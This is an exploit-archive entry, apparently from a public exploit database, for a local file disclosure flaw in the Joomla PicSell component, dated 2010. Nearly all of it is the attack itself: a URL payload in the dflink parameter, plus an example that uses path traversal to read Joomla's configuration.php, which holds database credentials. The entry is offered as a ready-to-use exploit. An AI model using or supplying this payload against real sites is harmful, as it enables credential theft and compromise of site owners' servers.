[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla PicSell Component (com_picsell) Local File Disclosure Vulnerability
# Published : 2010-08-30
# Author : Craw
# Previous Title : vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
# Next Title : Seagull 0.6.7 Remote File Inclusion Vulnerability
# Author: Craw
# Email: craw@element7.eu
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications
=======================================================
[+] ExploiT :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
[+] Example :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
=======================================================
Greetz @ LUXEMBOURG
=======================================================